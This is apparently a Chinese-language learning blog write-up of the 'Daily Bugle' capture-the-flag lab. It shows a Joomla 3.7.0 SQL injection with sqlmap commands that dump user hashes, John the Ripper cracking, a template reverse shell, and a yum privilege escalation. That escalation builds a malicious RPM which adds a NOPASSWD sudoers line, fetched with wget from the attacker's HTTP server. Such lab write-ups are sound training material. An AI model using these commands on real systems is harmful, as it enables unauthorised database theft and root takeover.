SugarCrash!

记录学习,想找个师傅带带我

0%

DailyBugle(每日号角)

通过 SQLi 入侵 Joomla CMS 帐户,练习破解哈希并利用 yum 提升您的权限。

Nmap

202205171258761.png
joomlacms

https://baijiahao.baidu.com/s?id=1713736979515625818&wfr=spider&for=pc

找到版本3.7.0找漏洞
202205171310112.png

joomla 3.7.0sqli

1
http://10.10.79.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
1
sqlmap -u "http://10.10.79.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

202205171450707.png

1
sqlmap -u "http://10.10.79.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T "#__users" -C username,password -p list[fullordering] --dump

202205171451647.png
破解hash

1
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

202205171508032.png

cpu转的都要起飞了

1
2
账号  jonah
密码 spiderman123

模板出插入字典自带的反弹shell 访问页面弹shell
202205171530588.png
cd /var/www/html找配置文件
202205171530577.png
cd /home 找到了jjameson
用配置文件中的密码可以直接登录
开始找东西提权

提权

202205171535712.png
202205171536726.png

https://gtfobins.github.io/gtfobins/yum/#sudo

Yum 是一个免费的开源命令行包管理实用程序,适用于使用 RPM 包管理器的基于 Linux 的操作系统。

在咨询 GTFOBins 之后,似乎 Yum 可用于提升权限,方法是制作恶意 RPM 包并将其安装在受害机器上:
用kali

1
2
3
4
5
apt-get install rpm
gem install fpm
fpm --version


1
2
3
4
5
6
```

```bash
TF=$(mktemp -d)
echo 'id' > $TF/x.sh
fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF

202205171547020.png

1
2
3
echo 'echo "jjameson ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > sudo.sh
fpm -n root -s dir -t rpm -a all --before-install sudo.sh .
python -m http.server 9001

202205171604448.png

1
2
3
4
wget http://10.13.40.87:9001/root-1.0–1.noarch.rpm
sudo yum localinstall -y root-1.0.1.noarch.rpm
安装完成后 sudo su
完成提权

202205171604447.png